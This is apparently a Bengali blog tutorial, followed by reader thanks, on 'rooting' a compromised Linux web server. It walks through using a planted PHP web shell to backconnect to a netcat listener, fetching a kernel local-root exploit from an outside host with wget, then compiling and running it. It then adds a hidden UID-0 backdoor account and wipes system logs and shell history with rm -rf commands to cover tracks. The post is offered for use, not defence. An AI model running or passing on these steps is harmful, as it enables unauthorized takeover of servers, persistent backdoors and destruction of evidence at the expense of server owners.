সার্ভার রুটিং কি ? কিভাবে সার্ভার রুটিং করতে হয় ?

8 110

আজকে বলতে গেলে কঠিন একটা বিষয় নিয়েই লিখছি । যারা একদম প্রথম পড়ছেন তারা কিছু বুঝবেন না । যারা সিকিউরিটি নিয়ে অনেকদিন ধরেই পড়ে আছেন তাদের কাছে এটি মজার বিষয়। আচ্ছা কথা না বাড়িয়ে চলুন শুরু করি ।

……………………………………………………………….10%3∞ …………………………………………………………..

 

সার্ভার রুটিং কি ?
রুট হল সব সার্ভার এর administrator । কেউ যদি রুট অ্যাক্সেস পেয়ে যায় তাহলে সে পুরো সার্ভার কে নিয়ন্ত্রন করতে পারবে। যেমন ধরুন ম্যাস ডিফেস কিংবা ক্রাশ করতে পারবে। অনেক হ্যাকিং গ্রুপ এ পন্থা অবলম্বন করে । সার্ভার রুটিং এর অনেকগুলো ভাগ আছে । আপনি যদি একদম এ নিয়ে শুরু করতে চান তাহলে  আপনার উইন্ডোজ পিসি  দিয়ে শুরু করাই ভাল হবে ।
একটি সার্ভারে ROOT করার তিনটি উপায় আছে
1 – With local Root.
2 – With SQL by reading same important files on it root password.
3 – With exploit on software (Buffer Overflow).
আমি আপনাদেরকে দেখাব উইন্ডোজ পিসি থেকে কিভাবে লিনাক্স এ রুট করতে হয় । আপনি এ ধরনের ইংরেজি অনেক টিউটোরিয়াল পাবেন কিন্তু  আপনার নিজের ভাষা তেই আপনি সবথেকে ভাল বুঝবেন ।

কাজের ধারা >>>>
যা যা লাগবে

> SHELLED SITE
> A LOCAL ROOT EXPLOIT
> NETCAT

Step 1 – Gathering informations
প্রথমে আপনার পিএইচপি শেল ওপেন করুন । আমি যেমন আমারটা করেছি ।

এখন আপনাকে জানতে হবে আপনার ভিক্টিম কি Kernel ব্যাবহার করে । এটি নিচের মত হতে পারে ।
Linux somehostingsite.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2013 i686
এখন আপনাকে কোন লোকাল রুট খুজে বের করতে হবে । যেমন আমার টা ছিল

2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2013 i686.
এসব খোজার জন্য আপনি
exploit-db, 1337day, th3-0utl4ws  এসব  সাইট ব্যাবহার করতে পারেন বা গুগল এ খুজলে হাজার হাজার পাওয়া যাবে ।
Step 2 – Backconnecting to the server
এর জন্য আপনার লাগবে
NetCat
Open port (Example. 443আমি আপনাকে পোর্ট ফরওয়ার্ডিং সেখাচ্ছি না …… গুগল এ খুজলেই পেয়ে যাবেন !!)
আপনার  netcat খুলে টাইপ করুন :
-l -n -v -p 443
Hit “Enter”
এই কাজ কিন্তু cmd তে করতে হবে

তাহলে এটি রিপ্লাই দেবে এরকম  “listening on [any] 443 …”

এবার আপনার শেল এ ফিরে যান । এরপর সেখানে আপনি “BackConnect function” পাবেন । এবার আপনার কাঙ্খিত পোর্ট নাম্বার লিখুন । আমি 443 ব্যাবহার করেছি । এরপর কানেক্ট করুন

এটি আপনার netcat কে কানেক্ট করবে। আমি নিচের ছবির মতই কিছু পেয়েছি ।
 

Step 3 – Downloading exploit and executing it
এখন আমাদের প্রথম ধাপের উপকরন লাগবে । শেল আপ্লোড করার দুটি পন্থা আছে
1) Using shell uploader
2) Using ‘wget’ function (Requires backconnection)
আমি দুই নম্বরটা কে সহজ মনে করি
। এরপর আপনার রুত এর লিঙ্ক টি কপি করুন । আমার টা ছিল এরকম
http://localroot.th3-0utl4ws.com/xploits…8-164.zip
এখন আপনার নেটকাটে ফিরে যান এবং লিঙ্ক  টাইপ করুন  । তাহলে এটি সার্ভারে 
“2.6.18-164.zip” নামে ফাইল ডাউনলোড করল ।
আপনার exploit টি যদি
anyrandomname.c নামে ডাউনলোড হয় তাহলে আপনাকে এটি কম্পাইল করতে হবে ।
প্রথমে ডাউনলোড করুন এবং টাইপ করুন
gcc anyrandomname.c -o anyrandomname
তাহলে এটি কম্পাইল হয়ে যাবে ।


আপনি যদি এক্সপ্লইট কে যে কোন  নাম যেমন anyrandomname.zip ডাউনলোড করেন তাহলে টাইপ করুন
unzip anyrandomname.zip


এখন আপনি আপনার এক্সপ্লইট পাবেন  (Like mine “2.6.18-164”)
এখন সবগুল ধাপ সম্পন্ন করার পর ……………………….

Type:chmod 777 yourexploit’sname
আমি যেখানে  your exploit লিখলাম   সেখানে আপনি নিজের টা লিখবেন

এখন সর্বোপরি exploit রান করতে হবে এটি লিখে
./yourexploit’sname
To check if you got root type
id
or
whoami

Step 4 – Adding root user
মানে আসল অ্যাডমিন ছাড়া  অন্যদের  এখানে এখানে অ্যাড করা যাবে এটি খুব সহজ ।
এই কম্যান্ড ব্যাবহার করুন
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M root2

কম্যান্ড এর ব্যাখা
Quote:adduser – এটি তখন ব্যাবহার করা হয় যখন কোন নতুন অ্যাকাউন্ট ওপেন হয়

-u 0 -o – Set the value of user id to 0.

-g 0 – Set the initial group number or name to 0

-G 0,1,2,3,4,6,10 – Set supplementary group to:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel

-M – ‘home directory’ not created for the user.

root2 –  এটি আপনার ইউযারনেম .NOTE: root2 তে আপনি  ইচ্ছা মত নাম দিতে পারেন

Now you need to set a password for your username.
Type in next:
passwd Root2

(Root2 is your username)
একটি উদাহরণ দেখুন

[[email protected] ~]# passwd root2
Changing password for user root2.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.

আপনি ঠিকমত  করেছেন কিনা এইকমান্ড দিয়ে তা পরীক্ষা করতে পারেন

id root2
(Root2 is your username)

 GNY shell – http://www.4shared.com/office/jLmzLh83/GNYShell.html
NetCat – 
এটি সেটাপ এ অনেকের সমস্যা হতে পারে তাই সরাসরি লিঙ্ক দিলাম না এই লিঙ্ক এ যান
http://linhost.info/2011/05/netcat-for-windows/

Clearing Logs:

এখন আমাদের সব ট্র্যাক মুছতে হবে
.rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout

rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name “log*” -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;

শেষ কথা
আপনি যদি হ্যাকিং এর প্রাথমিক বিষয় গুলো না যানেন তাহলে এই দিকে যাবেন না । এটি আপনার জন্য ক্ষতিকর হতে পারে
সমস্যা হলে বলবেন । আর এখান থেকে কিছু না বুঝলে আপনি অবশ্যই ভিডিও দেখবেন
এরকম সবকিছু >
http://www.facebook.com/CY133R  এ
আর আমি > http://www.facebook.com/techfreak.unknown
আল্লাহ হাফেয
……………………………………………………………….10%3∞ …………………………………………………………..

 

 

 

 

8 মন্তব্য
  1. B Islam বলেছেন

    wow nice one !!! Thanks

  2. দিপু রায়হান বলেছেন

    ধন্যবাদ আমাদের সাথে শেয়ার করার জন্য।

  3. sabuj4u বলেছেন

    আপনাকে অনেক অনেক ধন্যবাদ একটি মূল্যবান পোষ্ট শেয়ার করার জন্য ।
    আশা করি আগামীতে আরও ভাল কিছু আমাদের উপহার দিবেন । ধন্যবাদ আপনাকে ।

  4. Md Rubel Ahmed বলেছেন

    খুবই দরকারি । ধন্যবাদ

  5. Ahmed Solayman Rony বলেছেন

    ধন্যবাদ।

  6. মো: নাসির উদ্দিন বলেছেন

    নাইস। খুব ভাল পোস্ট। ধন্যবাদ আপনাকে।

  7. জাকির হোসেন বলেছেন

    সুন্দর পোস্ট। শেয়ার করার জন্য ধন্যবাদ।

  8. লিটন হাফিজুর বলেছেন

    নাইস পোসট।শেয়ার করার জন্য ধন্যবাদ আপনাকে।

উত্তর দিন